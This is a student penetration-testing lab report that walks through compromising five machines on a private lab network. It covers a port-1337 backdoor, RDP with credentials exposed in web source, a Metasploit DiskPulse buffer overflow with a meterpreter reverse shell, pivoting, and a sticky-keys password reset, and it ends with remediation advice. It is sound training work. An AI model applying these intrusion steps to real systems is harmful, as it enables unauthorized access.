NTS330

Final Lab - Exploitation

DECEMBER 10, 2017
BY: LIVIA NGUYEN, MARK LAROCQUE, VIRGIL WYLIE
Contents

Summary ......................................................................................................................................... 2

Information Gathering .................................................................................................................... 2

Port Scans Results ........................................................................................................................... 4

Exploitation ..................................................................................................................................... 6

Box #1 ......................................................................................................................................... 6
Box #2 ......................................................................................................................................... 7
Box #3 ......................................................................................................................................... 9
Box #4 ....................................................................................................................................... 11
Box #5 ....................................................................................................................................... 13
Recommendation .......................................................................................................................... 15

Reference ...................................................................................................................................... 17
Summary

The lab shows the process of performing a penetration test by showing the vulnerability of five

machine and how each will be compromised. There are five target that will be hacked into by

the team and the report will show details progress of how each machine is being compromised

and the different method that was used in the lab. There will be three phrases that happen, the

first one if information gathering to figured out who the target were on the network. Port Scan

will be run to test for targets that had open ports, which made them vulnerable and easy to attack.

Use port scan result to figured out the approach of each system and use it to attack the machines

of the five boxes.

Information Gathering

The target server located on 10.113.113.1-255 based on the ifconfig information.

Targets IP addresses (low-high)

1. 10.113.113.1

2. 10.113.113.10

3. 10.113.113.15

4. 10.113.113.20
 5. 10.113.113.50

6. 10.113.113.51

7. 10.113.113.100

8. 10.113.113.101

9. 10.113.113.102

10. 10.113.113.103

11. 10.113.113.105

12. 10.113.113.108

13. 10.113.113.109

14. 10.113.113.110

15. 10.113.113.112

16. 10.113.113.113

17. 10.113.113.114

18. 10.113.113.115

19. 10.113.113.116

The above is the list of all machine that run on the network 10.113.113.1. There are five possible

targets that has open ports and vulnerability that could be attacked, which has been highlighted in

red for further action. The port scan result show that there are five machine that has open ports,

which made them vulnerable at some degree and could be attack. It allows us to know exactly

which ports we could attack to get into the system.

Port Scans Results
Exploitation

Box #1

Address: 10.113.113.15

I use telnet to connect to 10.113.113.10 through port 1337 because telnet is unknown port listed

in the nmap scan. There is a backdoor port 1337 so netcat could also be used to get access to

host 10.113.113.10 system. Once I am inside of the console I browse through the C:\ drive of the

machine and found a text file that gives hint on how to get to the next target.
Box #2

Address: 10.113.113.15

After looking through the website source of host 10.113.113.15, it seems that the user has save

the username and password to their workstation login in the html. Since port 3389 are open on

this machine RDP could be using to remotely connect to the machine and uses the login

credential found on the 10.113.113.15 websites sources to get access to the machine. Enter

rdesktop 10.113.113.15 to get to the login screen of box 2 and input admin for the user name

and Th1sIS@SecureP@ssw0rd for the password and you will get access to the machine. A

text file was found on the desktop let us know the extra step that we need to take to get to the

next box.
Box #3

Address: 10.113.113.20

The website on 10.113.113.20 show that it is running DiskPulse_Enterprise_9.9.16 on it. We

use the last hint and go to ExploitDB and look for DiskPulse_Enterprise_9.9.16_GETBufer and

download the exploit to the system. We then Add it to the msfconsole and use it to exploit host

10.113.113.20 system. We then run the DiskPulse_Enterprise_9.9.16_GETBuffer exploit in the

msfconsole and set the target and listening address to the console. Use Set RHOST to set the

target address, which is 10.113.113.20 and show options can be used to see whether it has been

added. Use Set Payload windows/meterpreter/reverse_tcp to set the listening addresses, which

is your address by using set LHOST. Exploit the box successfully will bring you to the

meterpreter and it can be used to get to the system by simply enter shell. That will bring you

to the machine and command such as sysinfo will give information on the machine.
Get system information by typing sysinfo to get more information on the system.
Box #4

Address: 10.113.113.50

The plan is to used box 3 meterpreter and portfwd to exploit box 4 by setting up a pivot point.

After looking through the web sources of host 10.113.113.50 and there is a unique string appear

to be base64 encoded. We use duckduckgo search engine to search for the string and get the

result on the bottom, which confirm that the unique string is in fact base64 encoded. I use box

#3 to establish a pivot between my box and 10.113.113.20 as a pivot point to attack box 4. I then

decoded the encoded string found in the website sources and used it as the login password to the

server. I then remotely connected to the server through port 3389 by using command rdesktop

10.113.113.50 and uses the login credential to log in. The user name for the server is

administrator and the password it the decoded string of the encoded string found on the

website sources 82qgTtG64O#51En7!9Ib91c4D69NDt5$.

Box #5

Address: 10.113.113.51

The port scan result show that port 3389 RDP is open, therefore we can remotely connect to it

similar to box #3. We then tab the shift key 5 times using the sticky key on windows 10 to get to

the command prompt. net user were using to list the account on this machine and the default

account for the machine is under oldchap, which mean that the admin account is oldchap. Use

net user to reset the password for old chap by simple enter net user oldchap 12346 and the

password for oldchap were reset to 123456. Use the login credential to get access to the machine

by simple enter the user account and the new password.

Recommendation

I would have recommended that the company check and remove any backdoor that was open.

For example, box #1 one had a backdoor open on port 1337 where I can use nc or telnet to easily

walkthrough easily. For box #2, it is not wisely a good idea to put your credential information to

your admin account on a system with RDP port 3389 open, because I can remotely connect to the

machine and used the credential information to log into your account. Box number three is the

most secure compare to the last box, however, with DiskPulse_Enterprise_9.9.16 installed on it

make it vulnerable since there is an exploit that was create specifically to exploits the machines

in the exploitDB open sources. I was able to easily exploit the box with port 80 open by using an

external exploit downloaded from the exploitDB website. I then setup a pivot point between box

#3 and my machine to attack box #4 and the credential information could be found base64

encoded in the website sources. I was able to decode the string and used it to log into the server
of box #4. Box #5 could easily be login by changing the credential information through

command prompt by using the sticky key option to open it, which make it vulnerable. The best

way is to disable any option of sticky key from the login screen and make sure that people will

not be able to have access to the command prompt without logging into the machine.
Reference

Metasploit. (2017, September 21). Disk Pulse Enterprise 9.9.16 - GET Buffer Overflow

(Metasploit). Retrieved December 10, 2017, from https://www.exploit-

db.com/exploits/42767/